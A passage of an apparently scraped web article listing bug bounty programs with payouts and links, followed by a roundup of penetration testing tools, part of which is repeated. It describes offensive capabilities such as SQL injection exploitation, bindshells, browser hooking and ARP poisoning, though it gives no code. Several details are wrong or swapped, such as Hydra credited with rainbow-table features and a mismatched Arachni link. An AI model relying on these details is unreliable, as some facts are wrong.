Minimum payout: The Company will pay minimum $500
Maximum Payout: The maximum amount paid by this company is $5000.
Bounty Link: https://vimeo.com/about/security
14) Apache
Apache encourages ethical hackers to report security vulnerabilities to one of their private security mailing lists.
Minimum payout: The minimum pay out amount given by Apache is $500.
Maximum Payout: This Company can maximum give a reward of $3000.
Bounty Link: https://www.apache.org/security/
15) Twitter
Twitter allows security researchers and experts about possible security vulnerabilities in their services. The company encourages people to find bugs.
Minimum Payout: Twitter is paying minimum $140 amount.
Maximum Payout: Maximum amount pay by the company is $15000.
Bounty Link: https://support.twitter.com/articles/477159
16) Avast
Avast bounty program rewards ethical hackers and security researchers to report Remote code execution, Local privilege escalation, DOS, scanner bypass amongst other issues.
Minimum Payout: Avast can pay you the minimum amount of $400.
Maximum Payout: The maximum amount offered by the company is $10,000.
Bounty Link: https://www.avast.com/bug-bounty
17) Paypal
Payment gateway service Paypal also offers bug bounty programs for security researchers.
Limitations:
Vulnerabilities dependent upon social engineering techniques, Host Header
Denial of service (DOS), User defined payload, Content spoofing without embedded links/HTM and Vulnerabilities which require a jailbroken mobile device, etc.
Minimum Payout: Paypal can pay minimum $50 for finding security vulnerabilities in their system.
Maximum Payout: Maximum payout amount given by Paypal is $10000.
Bounty Link: https://www.paypal.com/us/webapps/mpp/security-tools/reporting-security-issues
18) GitHub
GitHub's runs bug bounty program since 2013. Every successful participant earned points for their vulnerability submissions depending on the severity.
Limitation: The security researcher will receive that bounty only if they respect users' data and don't exploit any issue to produce an attack that could harm the integrity of GitHub's services or information.
Minimum Payout: Github pays a minimum amount of $200 for finding bugs.
Maximum Payout: Github can pay $10000 for finding critical bugs.
Bounty Link: https://bounty.github.com/
19) Uber
The vulnerability rewards program of Uber primarily focused on protecting the data of users and its employees.
Minimum Payout: There is no predetermined minimum amount.
Maximum Payout: Uber will pay you $10,000 for finding critical bug issues.
Bounty Link: https://eng.uber.com/bug-bounty/
20) Magento
Magneto bounty program allows you to report security vulnerabilities in Magneto software or websites.
Limitations:
Following security research is not eligible for the bounty
Potential or actual denial of service of Magento applications and systems.
Use of an exploit to view data without authorization.
Automated/scripted testing of web forms
Minimum Payout: Minimum payout amount for this is bounty program is $100.
Maximum Payout: Magento is paying maximum $10,000 for finding critical bugs.
Bounty Link: https://magento.com/security
21) Perl
Perl is also running bug bounty programs. If someone found a security vulnerability in Perl, they can contact the company.
Minimum Payout: The Company pays a minimum amount of $500.
Maximum Payout: The highest amount given by Perl is $1500.
Bounty Link: http://perldoc.perl.org/perlsec.html#SECURITY-VULNERABILITY-CONTACT-INFORMATION
22) PHP
PHP allows ethical hackers to find a bug in their site.
Limitations: You need to check the list of already finding bugs. If you not follow this instruction your bug is not considered.
Maximum Payout: Minimum Payout amount is $500.
Minimum Payout: Maximum $1500 is given by PHP for searching important bugs.
Bounty Link: https://bugs.php.net/report.php?bug_type=Security
23) Starbucks
Starbucks runs bug Bounty program to protect their customers. They encourage to find malicious activity in their networks, web and mobile applications policies.
Minimum Payout: The minimum amount paid by Starbucks $100.
Maximum Payout: The maximum amount goes up to $4000.
Bounty Link: https://www.starbucks.com/whitehat
24) AT&T
AT&T also has its bug hunting channel. Developers and security experts can research the various platforms like websites, APIs, and mobile applications.
Minimum Payout: Minimum Amount Paid by them is $500.
Maximum Payout: There is no such upper limit for payout.
Bounty Link: https://bugbounty.att.com/home.php
25) LinkedIn
The LinkedIn welcomes Individual researchers who contribute their expertise and time to find bugs.
The company will reward you, but neither minimum nor maximum amount is a fix for this purpose.
Bounty Link: https://security.linkedin.com/posts/2015/private-bug-bounty-program
26) Paytm
Paytm invites independent security groups or individual researchers to study it across all platforms
Limitations:
Reports that state that software is out of date/vulnerable without a 'Proof of Concept.'
XSS issues that affect only outdated browsers.
Stack traces that disclose information.
Any fraud issues
Minimum Payout: The Company will pay minimum $15 for finding bugs.
Maximum Payout: This company does not fix the upper limit.
Bounty Link: https://paytm.com/offer/bug-bounty/
27) Shopify
Shopify's Whitehat program rewards security researchers for finding severe security vulnerabilities
Minimum Payout: The minimum amount paid by the Shopify is $500.
Maximum Payout: There is no fix upper limit for paying the bounty.
Bounty Link: https://www.shopify.in/whitehat
28) Word Press
WordPress also welcomes security researchers to report about the bugs that they have found.
Minimum Payout: WordPress Pays $150 minimum for reporting bugs on their site.
Maximum Payout: The Company does not fix a maximum limit to pay as bounty.
Bounty Link: https://make.wordpress.org/core/handbook/testing/reporting-bugs/
29) Zomato
Zomato helps security researcher to identified security-related issues with company's website or apps.
Minimum Payout: Zomato will pay minimum $1000 for finding important bugs.
Maximum Payout: There is no maximum fix amount.
Bounty Link: https://www.zomato.com/security
30) Tor Project
Tor Project's bug bounty program covers two of its core services: its network daemon and browser.
Limitation: OpenSSL applications are excluded from this scope.
Minimum Payout: The minimum amount paid by them is $100.
Maximum Payout: The Company will pay you maximum $4000.
(No link available) Bounty Link: security@lists.torproject.org
31) Hackerone
HackerOne is one of the biggest vulnerability coordination and bug bounty platform. It helps companies to protect their consumer data by working with the global research community for finding most relevant security issues. Many known companies like Yahoo, Shopify, PHP, Google, Snapchat, and Wink are taking the service of this website to give a reward to security researchers and ethical hackers.
Bounty Link: https://hackerone.com/bug-bounty-programs
32) Bugcrowd
A powerful platform connecting the global security researcher community to the security market. This site aims to provide right mix and type of researcher suited according to the specific website to their worldwide clients. The hackers just need to select their reports on this site, and if they can detect right bugs, the specific company will pay the amount to that person.
Bounty Link: https://www.bugcrowd.com/bug-bounty-list/
40 Best Penetration Testing (Pen Testing) Tools in 2020
Penetration Testing tools help in identifying security weaknesses ing a network, server or web application. These tools are very useful since they allow you to identify the "unknown vulnerabilities" in the software and networking applications that can cause a security breach. Vulnerability Assessment and Penetration Testing (VAPT) Tools attack your system within the network and outside the network as if an hacker would attack it. If the unauthorized access is possible, the system has to be corrected.
Here is a list of top 40 Penetration Testing Tools
1) Netsparker
Netsparker is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution.
Features
Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.
Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.
REST API for seamless integration with the SDLC, bug tracking systems etc.
Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated penetration testing tool. Its web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.
Features:
Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
Detects over 1200 WordPress core, theme, and plugin vulnerabilities
Fast & Scalable – crawls hundreds of thousands of pages without interruptions
Integrates with popular WAFs and Issue Trackers to aid in the SDLC
Available On Premises and as a Cloud solution.
3) Indusface
Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.
Features
Crawler scans single page applications
Pause and resume feature
Manual PT and Automated scanner reports displayed in the same dashboard
Unlimited proof of concept requests offers evidence of reported vulnerabilities and helps eliminate false positive from automated scan findings
Optional WAF integration to provide instant virtual patching with Zero False positive
Automatically expands crawl coverage based on real traffic data from the WAF systems (incase WAF is subscribed and used)
24×7 support to discuss remediation guidelines/POC
4) ImmuniWeb
ImmuniWeb is a global provider of web and mobile application penetration testing and security ratings. ImmuniWeb AI Platform enhances human testing with award-winning AI technology to accelerate and expand security testing. ImmuniWeb is recognized by Gartner, Forrester and IDC for rapid, scalable and DevSecOps-enabled penetration testing that greatly surpasses traditional penetration testing approaches.
Features:
Rapid delivery SLA
Zero False-Positive SLA
SANS Top 25 Full Coverage
OWASP Top 10 Full Coverage
PCI DSS 6.5.1-6.5.11 Full Coverage
Tailored Remediation Guidelines
24/7 Access to Our Security Analysts
Integration with SDLC & CI/CD Tools
One-Click Virtual Patching via WAF
5) PureVPN
PureVPN is an indispensable tool in an Ethical hackers arsenal. You may need it to check target in different geographies, simulate nonpersonalized browsing behavior, anonymized file transfers, etc.
Features:
No Log VPN with high security and anonymity
Very fast speeds with 2000+ servers across continents
Based in Hongkong, it does not store any data.
Split tunneling and 5 simultaneous logins
24/7 support
Supports Windows, Mac, Android, Linux, iPhone, etc.
300,000+ IPs
Port Forwarding, Dedicated IO and P2P Protection
31 Day Money-Back Guarantee
6) Owasp
The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include
Zed Attack Proxy (ZAP – an integrated penetration testing tool)
OWASP Dependency Check (it scans for project dependencies and checks against know vulnerabilities)
OWASP Web Testing Environment Project (collection of security tools and documentation)
The OWASP testing guide gives "best practice" to penetration test the most common web application
7) WireShark
Wireshark is a network analysis tool previously known as Ethereal. It captures packet in real time and display them in human readable format. Basically, it is a network packet analyzer- which provides the minute details about your network protocols, decryption, packet information, etc. It is an open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information that is retrieved via this tool can be viewed through a GUI or the TTY mode TShark Utility.
WireShark features include
Live capture and offline analysis
Rich VoIP analysis
Capture files compressed with gzip can be decompressed on the fly
Output can be exported to XML, PostScript, CSV or plain text
Multi-platform: Runs on windows, Linux, FreeBSD, NetBSD and many others
Live data can be read from internet, PPP/HDLC, ATM, Blue-tooth, USB, Token Ring, etc.
Decryption support for many protocols that include IPsec, ISAKMP, SSL/TLS,WEP, and WPA/WPA2
For quick intuitive analysis, coloring rules can be applied to the packet
Read/Write many different capture file formats
8) w3af
w3af is a web application attack and audit framework. It has three types of plugins; discovery, audit and attack that communicate with each other for any vulnerabilities in site, for example a discovery plugin in w3af looks for different url's to test for vulnerabilities and forward it to the audit plugin which then uses these URL's to search for vulnerabilities.
It can also be configured to run as a MITM proxy. The request intercepted could be sent to the request generator and then manual web application testing can be performed using variable parameters. It also has features to exploit the vulnerabilities that it finds.
W3af features
Proxy support
HTTP response cache
DNS cache
File uploading using multipart
Cookie handling
HTTP basic and digest authentication
User agent faking
Add custom headers to requests
9) Metaspoilt
This is the most popular and advanced Framework that can be used for pentest. It is an open source tool based on the concept of 'exploit' which means you pass a code that breach the security measures and enter a certain system. If entered, it runs a 'payload', a code that performs operations on a target machine, thus creating the perfect framework for penetration testing. It is a great testing tool test whether the IDS is successful in preventing the attacks that we bypass it
Metaspoilt can be used on networks, applications, servers, etc. It has a command line and GUI clickable interface, works on Apple Mac OS X, works on Linux and Microsoft Windows.
Features of Metaspoilt
Basic command line interface
Third party import
Manual brute forcing
Manual brute forcing
website penetration testing
10) Kali
Kali works only on Linux Machines. It enables you to create a backup and recovery schedule that fit your needs. It promotes a quick and easy way to find and update the largest database of security penetration testing collection to-date. It is the best tools available for packet sniffing and injecting. An expertise in TCP/IP protocol and networking can be beneficial while using this tool.
Features
Addition of 64 bit support allows brute force password cracking
Back Track comes with pre-loaded tools for LAN and WLAN sniffing, vulnerability scanning, password cracking, and digital forensics
Backtrack integrates with some best tools like Metaspoilt and Wireshark
Besides network tool, it also includes pidgin, xmms, Mozilla, k3b, etc.
Back track support KDE and Gnome.
11) Samurai framework:
The Samurai Web Testing Framework is a penetration testing software. It is supported on VirtualBox and VMWare that has been pre-configured to function as a web pen-testing environment.
Features:
It is open source, free to use tool
It contains the best of the open source and free tools that focus on testing and attacking website
It also includes a pre-configured wiki to set up the central information store during the pen-test
Download link: https://sourceforge.net/projects/samurai/files/
12) Aircrack:
Aircrack is one of the handy tool required in wireless pen testing. It cracks vulnerable wireless connections. It is powered by WEP WPA and WPA 2 encryption Keys.
Features:
More cards/drivers supported
Support all types of OS and platforms
New WEP attack: PTW
Support for WEP dictionary attack
Support for Fragmentation attack
Improved tracking speed
Download link: https://www.aircrack-ng.org/downloads.html
13) ZAP:
ZAP is one of the most popular open source security testing tool. It is maintained by hundreds of international volunteers. It can help users to find security vulnerabilities in web applications during the developing and testing phase.
Features:
It helps to Identifies the security holes present in the web application by simulating an actual attack
Passive scanning analyse the responses from the server to identify certain issues
It attempts brute force access to files and directories.
Spidering feature helps to construct the hierarchical structure of the website
Supplying invalid or unexpected data to crash it or to produce unexpected results
Helpful tool to find out the open ports on the target website
It provides an interactive Java shell which can be used to execute BeanShell scripts
It is fully internationalized and supports 11 languages
Download link: https://github.com/zaproxy/zaproxy/wiki
14) Sqlmap:
Sqlmap is an open source penetration testing tool. It automates the entire process of detecting and exploiting SQL injection flaws. It comes with many detection engines and features for an ideal penetration test.
Features:
Full support for six SQL injection techniques
Allows direct connection to the database without passing via a SQL injection
Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns
Automatic recognition of password given in hash formats and support for cracking them
Support to dump database tables entirely or specific columns
The users can also select a range of characters from each column's entry
Allows to establish TCP connection between the affected system and the database server
Support to search for specific database names, tables or specific columns across all databases and tables
Allows to execute arbitrary commands and retrieve their standard output on the database server
Download link: https://github.com/sqlmapproject/sqlmap
15) Sqlninja:
Sqlninja is a penetration testing tool. It is aimed to exploit SQL Injection vulnerabilities on a web application. It uses Microsoft SQL Server as back-end. It also provides a remote access on the vulnerable DB server, even in a very hostile environment.
Features:
Fingerprinting of the remote SQL
Data extraction, time-based or using DNS tunnel
Allows Integration with Metasploit3, to obtain a graphical access to the remote DB server
Upload of executable using only normal HTTP requests via VBScript or debug.exe
Direct and reverse bindshell, both for TCP and UDP
Creation of a custom xp cmdshell if the original one is not available on w2k3 using token kidnapping
Download link: http://sqlninja.sourceforge.net/download.html
16) BeEF:
The Browser Exploitation Framework. It is a pen testing tool that focuses on the web browser. It uses GitHub to track issues and host its git repository.
Features:
It allows to check the actual security posture by using client-side attack vectors
BeEF allows to hook with one or more web browsers. It can then be used for launching directed command modules and further attacks on the system.
Download link: http://beefproject.com
17) Dradis:
Dradis is an open source framework for penetration testing. It allows maintaining the information that can be shared among the participants of a pen-test. The information collected helps users to understand what is completed and what needs to completed.
Features:
Easy process for report generation
Support for attachments
Seamless collaboration
Integration with existing systems and tools using server plugins
Platform independent
Download link: https://dradisframework.com/ce
18) Rapid 7:
Nexpose Rapid 7 is a useful vulnerability management software. It monitors exposures in real-time and adapts to new threats with fresh data which helps users to act at the moment of impact.
Features:
Get a Real-Time View of Risk
It brings innovative and progressive solutions that help the user to get their jobs done
Know Where to Focus
Bring More to Your Security Program
Download link: https://www.rapid7.com/products/nexpose/download/
19) Hping:
Hping is a TCP/IP packet analyzer pen testing tool. This interface is inspired to the ping (8) UNIX command. It supports TCP, ICMP, UDP, and RAW-IP protocols.
Features:
Allows firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute with all the supported protocols
Remote OS fingerprinting & uptime guessing
TCP/IP stacks auditing
Download link: https://github.com/antirez/hping
20) SuperScan:
Superscan is a free Windows-only closed-source penetration testing tool. It also includes networking tools such as ping, traceroute, whois and HTTP HEAD.
Feature:
Superior scanning speed
Support for unlimited IP ranges
Improved host detection using multiple ICMP methods
Provide support for TCP SYN scanning
Simple HTML report generation
Source port scanning
Extensive banner grabbing
Large built-in port list description database
IP and port scan order randomization
Extensive Windows host enumeration capability
Download link: https://www.mcafee.com/in/downloads/free-tools/termsofuse.aspx
21) ISS Scanner:
The IBM Internet Scanner is a pen testing tool which offers the foundation for the effective network security for any business.
Features:
Internet Scanner minimize the business risk by finding the weak spots in the network
It allows to automate scans and discover vulnerabilities
Internet Scanner cuts the risk by identifying the security holes, or vulnerabilities, in the network
Complete Vulnerability Management
Internet Scanner can identify more than 1,300 types of networked devices
Download link: https://www-01.ibm.com/software/info/trials
22) Scapy:
Scapy is a powerful and interactive pen testing tool. It can handle many classical tasks like scanning, probing, and attacks on the network.
Features:
It performs some specific tasks like sending invalid frames, injecting 802.11 frames. It uses various combining techniques which is hard to do with other tools
It allows user to build exactly the packets they want
Reduces the number of lines written to execute the specific code
Download link: http://secdev.org/projects/scapy/
23) IronWASP:
IronWASP is an open source software for web application vulnerability testing. It is designed to be customizable so that users can create their custom security scanners using it.
Features:
GUI based and very easy to use
It has powerful and an effective scanning engine
Support for recording Login sequence
Reporting in both HTML and RTF formats
Checks for over 25 types of web vulnerabilities
False Positives and Negatives detection support
It supports Python and Ruby
Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET
Download link: http://ironwasp.org/download.html
24) Ettercap:
Ettercap is a comprehensive pen testing tool. It supports active and passive dissection. It also includes many features for network and host analysis.
Features:
It supports active and passive dissection of many protocols
Feature of ARP poisoning to sniff on a switched LAN between two hosts
Characters can be injected into a server or to a client while maintaining a live connection
Ettercap is capable of sniffing an SSH connection in full duplex
Allows sniffing of HTTP SSL secured data even when the connection is made using proxy
Allows creation of custom plugins using Ettercap's API
Download link: https://ettercap.github.io/ettercap/downloads.html
25) Security Onion:
Security Onion is a penetration testing tool. It is used for intrusion detection, and network security monitoring. It has an easy-to-use Setup wizard allows users to build an army of distributed sensors for their enterprise.
Features:
It is built on a distributed client-server model
Network Security Monitoring allows monitoring for security related events
It offers full packet capture
Network-based and host-based intrusion detection systems
It has a built-in mechanism to purge old data before storage device fill to its capacity
Download link: https://securityonion.net/
26) Personal Software Inspector:
Personal Software Inspector is an open source computer security solution. This tool can identify vulnerabilities in applications on a PC or a Server.
Features:
It is available in eight different languages
Automates the updates for insecure programs
It covers thousands of programs and automatically detects insecure programs
This pen testing tool automatically and regularly scans PC for vulnerable programs
Detects and notifies programs that can't be automatically updated
Download link: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector
27) HconSTF:
HconSTF is Open Source Penetration Testing tool based on different browser technologies. It helps any security professional to assists in the Penetration testing. It contains web tools which are powerful in doing XSS, SQL injection, CSRF, Trace XSS, RFI, LFI, etc.
Features:
Categorized and comprehensive toolset
Every option is configured for penetration testing
Specially configured and enhanced for gaining solid anonymity
Works for web app testing assessments
Easy to use & collaborative Operating System
Download link: http://www.hcon.in/
28) IBM Security AppScan:
IBM Security AppScan helps to enhance web application security and mobile application security. It improves application security and strengthens regulatory compliance. It helps users to identify security vulnerabilities and generate reports.
Features:
Enable Development and QA to perform testing during SDLC process
Control what applications each user can test
Easily distribute reports
Increase visibility and better understand enterprise risks
Focus on finding and fixing issues
Control the access of information
Download link: http://www-03.ibm.com/software/products/en/appscan
29) Arachni:
Arachni is an open source Ruby framework based tool for penetration testers & administrators. It is used for evaluating the security of modern web applications.
Features:
It is a versatile tool, so it covers large numbers of use-cases. This ranging from a simple command line scanner utility to a global high-performance grid of scanners
Option for Multiple deployments
It offers verifiable, inspectable code base to ensure the highest level of protection
It can easily integrate with browser environment
It offers highly detailed and well-structured reports
Download link: https://sourceforge.net/projects/safe3wvs/files
30) Websecurify:
Websecurify is a powerful security testing environment. It is a user -friendly interface which is simple and easy to use. It offers a combination of automatic and manual vulnerability testing technologies.
Features:
Good testing and scanning technology
Strong testing engine to detect URLs
It is extensible with many available add-ons
It is available for all the major desktop and mobile platforms
Download link: https://www.websecurify.com/
31) Vega:
Vega is an open source web security scanner and pen testing platform to test the security of web applications.
Features:
Automated, Manual, and Hybrid Security Testing
It helps users to find vulnerabilities. It may be cross-site scripting, stored cross-site scripting, blind SQL injection, shell injection, etc.
It can automatically log into websites when supplied with user credentials
It runs effectively on Linux, OS X, and Windows
Vega detection modules are written in JavaScript
Download link: https://subgraph.com/vega/download/index.en.html
32) Wapiti:
Wapiti is another famous penetration testing tool. It allows auditing the security of the web applications. It supports both GET and POST HTTP methods for the vulnerability check.
Features:
Generates vulnerability reports in various formats
It can suspend and resume a scan or an attack
Fast and easy way to activate and deactivate attack modules
Support HTTP and HTTPS proxies
It allows restraining the scope of the scan
Automatic removal of a parameter in URLs
Import of cookies
It can activate or deactivate SSL certificates verification
Extract URLs from Flash SWF files
Download link: https://sourceforge.net/projects/wapiti/files/
33) Kismet:
Kismet is a wireless network detector and intrusion detection system. It works with Wi-Fi networks but can be expanded via plugins as it allows to handle other network types.
Features:
Allows standard PCAP logging
Client/Server modular architecture
Plug-in architecture to expand core features
Multiple capture source support
Distributed remote sniffing via light-weight remote capture
XML output for integration with other tools
Download link: https://www.kismetwireless.net/download.shtml
34) Kali Linux:
Kali Linux is an open source pen testing tool which is maintained and funded by Offensive Security.
Features:
Full customization of Kali ISOs with live-build to create customized Kali Linux images
It contains a bunch of Meta package collections which aggregate different tool sets
ISO of Doom and Other Kali Recipes
Disk Encryption on Raspberry Pi 2
Live USB with Multiple Persistence Stores
Download link: https://www.kali.org/
35) Parrot Security:
Parrot Security is a pen testing tool. It offers fully portable laboratory for security and digital forensics experts. It also helps users to protect their privacy with anonymity and crypto tools.
Features:
It includes a full arsenal of security oriented tools to perform penetration tests, security audits and more.
It comes with preinstalled and useful and updated libraries
Offers powerful worldwide mirror servers
Allows community-driven development
Offers separate Cloud OS specifically designed for servers
Download link: https://www.parrotsec.org/download.fx
36) OpenSSL:
This toolkit is licensed under an Apache-style license. It is free and open source project that provides a full-featured toolkit for the TLS and SSL protocols.
Features:
It is written in C, but wrappers are available for many computer languages
The library includes tools for generating RSA private keys and Certificate Signing Requests
Verify CSR file
Completely remove Passphrase from Key
Create new Private Key and allows Certificate Signing Request
Download link: https://www.openssl.org/source/
37) Snort:
Snort is an open-source intrusion detection and pen testing system. It offers the benefits of signature-protocol- and anomaly-based inspection methods. This tool helps users to get maximum protection from malware attacks.
Features:
Snort gained notoriety for being able to detect threats accurately at high speeds
Protect your workspace from emerging attacks quickly
Snort can be used to create customized unique network security solutions
Test SSL certificate of a particular URL
It can check if particular cipher is accepted on URL
Verify the Certificate Signer Authority
Ability to submit false positives/negatives
Download link: https://www.snort.org/downloads
38) Backbox:
BackBox is an Open Source Community project with the objective of enhancing the culture of security in IT environment. It is available in two different variations like Backbox Linux and Backbox Cloud. It includes some of the most commonly known/used security and analysis tools.
Features:
It is helpful tool to reduce company resource needs and lower costs of managing multiple network device requirements
It is fully automated pen testing tool. So, no agents and no network configuration needed to make changes. In order to perform scheduled automated configuration
Secure Access to Devices
Organizations can save time as there is no need to track individual network devices
Supports Credential and Configuration File Encryption
Self-Backup and Automatic Remote Storage
Offers IP Based Access Control
No need to write command as it comes with pre-Configured Commands
Download link: https://backbox.org/download
39) THC Hydra:
Hydra is a parallelized login cracker and pen testing tool. It is very fast and flexible, and new modules are easy to add. This tool allows researchers and security consultants to find unauthorized access.
Features:
Full time-memory trade-off tool suites along with rainbow table generation, sort, conversion and look up
It supports rainbow table of any hash algorithm
Support rainbow table of any charset
Support rainbow table in compact or raw file format
Computation on multi-core processor support
Runs on Windows and Linux operating systems
Unified rainbow table file format on all supported OS
Support GUI and Command line user interface
Download link: https://github.com/vanhauser-thc/thc-hydra
40) Reputation Monitor Alert:
Open Threat Exchange Reputation Monitor is a free service. It allows professionals to track their organization's reputation. With the help of this tool, businesses and organizations can track the public IP and domain reputation of their assets.
Features:
Monitors cloud, hybrid cloud, and on-premises infrastructure
Delivers continuous threat intelligence to keep update about threats as they emerge
Provides most comprehensive threat detection and actionable incident response directives
Deploys quickly, easily, and with less number of efforts
Reduces TCO over traditional security solutions
Download link: https://www.alienvault.com/try-it-free?utm_internal=sb_freetrial_modal
41) John the Ripper:
John the Ripper known as JTR is a very popular password cracking tool. It is primarily used to perform dictionary attacks. It helps identify weak password vulnerabilities in a network. It also supports users from brute force and rainbow crack attacks.
Features:
John the Ripper is free and Open Source software
Proactive password strength checking module
It allows online browsing of the documentation
Support for many additional hash and cipher types
Allows to browse the documentation online including summary of changes between two versions
Download link: http://www.openwall.com/john/
42) Safe3 scanner:
Safe3WVS is one of the most powerful web vulnerability testing tool. It comes with web spider crawling technology, especially web portals. It is the fastest tool to find issues like SQL injection, upload vulnerability, and more.
Features:
Full support for Basic, Digest and HTTP authentications.
Intelligent web spider automatic removes repeated web pages
An automatic JavaScript analyzer provide support for extracting URLs from Ajax, Web 2.0 and any other applications
Support to scan SQL injection, upload vulnerability, admin path and directory list vulnerability
Download link: https://sourceforge.net/projects/safe3wvs/files/latest/download
43) CloudFlare:
CloudFlare is CDN with robust security features. Online threats range from comment spam and excessive bot crawling to malicious attacks like SQL injection. It provides protection against comment spam, excessive bot crawling, and malicious attacks.
Feature:
It is an enterprise-class DDoS protection network
Web application firewall helps from the collective intelligence of the entire network
Registering domain using CloudFlare is the most secure way to protect from domain hijacking
Rate Limiting feature protects user's critical resources. It blocks visitors with suspicious number of request rates.
CloudFlare Orbit solves security issues for IOT devices
Download link: https://www.cloudflare.com/
44) Zenmap
Zenmap is the official Nmap Security Scanner software. It is a multi-platform free and open source application. It is easy to use for beginners but also offers advanced features for experienced users.
Features:
Interactive and graphical results viewing
It summarizes details about a single host or a complete scan in a convenient display.
It can even draw a topology map of discovered networks.
It can show the differences between two scans.
It allows administrators to track new hosts or services appearing on their networks. Or track existing services that go down
Download link: https://nmap.org/download.html
The other tools that might be useful for penetration testing are
Acunetix: It is a web vulnerability scanner targeted at web applications. It is expensive tool compare to others and provides facility like cross site scripting testing, PCI compliance reports, SQL injection, etc.
Retina: It is more like a vulnerability management tools than a pre-testing tool
Nessus: It concentrates in compliance checks, sensitive data searches, IPs scan, website scanning, etc.
Netsparker: This tool comes with a robust web application scanner that identifies vulnerabilities and suggest solutions. There are free limited trials available but most of the time it is a commercial product. It also helps to exploit SQL injection and LFI (Local File Induction)
CORE Impact: This software can be used for mobile device penetration, password identification and cracking, network devise penetration etc. It is one of the expensive tools in software testing
Burpsuite: Like other this software is also a commercial product. It works on by intercepting proxy, web application scanning, crawling content and functionality etc. The advantage of using Burpsuite is that you can use this on windows, Linux and Mac OS X environment.
40 Best Penetration Testing (Pen Testing) Tools in 2020
Penetration Testing tools help in identifying security weaknesses ing a network, server or web application. These tools are very useful since they allow you to identify the "unknown vulnerabilities" in the software and networking applications that can cause a security breach. Vulnerability Assessment and Penetration Testing (VAPT) Tools attack your system within the network and outside the network as if an hacker would attack it. If the unauthorized access is possible, the system has to be corrected.
Here is a list of top 40 Penetration Testing Tools
1) Netsparker
Netsparker is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution.
Features
Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.
Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.
REST API for seamless integration with the SDLC, bug tracking systems etc.
Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated penetration testing tool. Its web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.
Features:
Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
Detects over 1200 WordPress core, theme, and plugin vulnerabilities
Fast & Scalable – crawls hundreds of thousands of pages without interruptions
Integrates with popular WAFs and Issue Trackers to aid in the SDLC
Available On Premises and as a Cloud solution.
3) Indusface
Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.
Features
Crawler scans single page applications
Pause and resume feature
Manual PT and Automated scanner reports displayed in the same dashboard
Unlimited proof of concept requests offers evidence of reported vulnerabilities and helps eliminate false positive from automated scan findings
Optional WAF integration to provide instant virtual patching with Zero False positive
Automatically expands crawl coverage based on real traffic data from the WAF systems (incase WAF is subscribed and used)
24×7 support to discuss remediation guidelines/POC
4) ImmuniWeb
ImmuniWeb is a global provider of web and mobile application penetration testing and security ratings. ImmuniWeb AI Platform enhances human testing with award-winning AI technology to accelerate and expand security testing. ImmuniWeb is recognized by Gartner, Forrester and IDC for rapid, scalable and DevSecOps-enabled penetration testing that greatly surpasses traditional penetration testing approaches.
Features:
Rapid delivery SLA
Zero False-Positive SLA
SANS Top 25 Full Coverage
OWASP Top 10 Full Coverage
PCI DSS 6.5.1-6.5.11 Full Coverage
Tailored Remediation Guidelines
24/7 Access to Our Security Analysts
Integration with SDLC & CI/CD Tools
One-Click Virtual Patching via WAF
5) PureVPN
PureVPN is an indispensable tool in an Ethical hackers arsenal. You may need it to check target in different geographies, simulate nonpersonalized browsing behavior, anonymized file transfers, etc.
Features:
No Log VPN with high security and anonymity
Very fast speeds with 2000+ servers across continents
Based in Hongkong, it does not store any data.
Split tunneling and 5 simultaneous logins
24/7 support
Supports Windows, Mac, Android, Linux, iPhone, etc.
300,000+ IPs
Port Forwarding, Dedicated IO and P2P Protection
31 Day Money-Back Guarantee
6) Owasp
The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include
Zed Attack Proxy (ZAP – an integrated penetration testing tool)
OWASP Dependency Check (it scans for project dependencies and checks against know vulnerabilities)
OWASP Web Testing Environment Project (collection of security tools and documentation)
The OWASP testing guide gives "best practice" to penetration test the most common web application
7) WireShark
Wireshark is a network analysis tool previously known as Ethereal. It captures packet in real time and display them in human readable format. Basically, it is a network packet analyzer- which provides the minute details about your network protocols, decryption, packet information, etc. It is an open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information that is retrieved via this tool can be viewed through a GUI or the TTY mode TShark Utility.
WireShark features include
Live capture and offline analysis
Rich VoIP analysis
Capture files compressed with gzip can be decompressed on the fly
Output can be exported to XML, PostScript, CSV or plain text
Multi-platform: Runs on windows, Linux, FreeBSD, NetBSD and many others
Live data can be read from internet, PPP/HDLC, ATM, Blue-tooth, USB, Token Ring, etc.
Decryption support for many protocols that include IPsec, ISAKMP, SSL/TLS,WEP, and WPA/WPA2
For quick intuitive analysis, coloring rules can be applied to the packet
Read/Write many different capture file formats
8) w3af
w3af is a web application attack and audit framework. It has three types of plugins; discovery, audit and attack that communicate with each other for any vulnerabilities in site, for example a discovery plugin in w3af looks for different url's to test for vulnerabilities and forward it to the audit plugin which then uses these URL's to search for vulnerabilities.
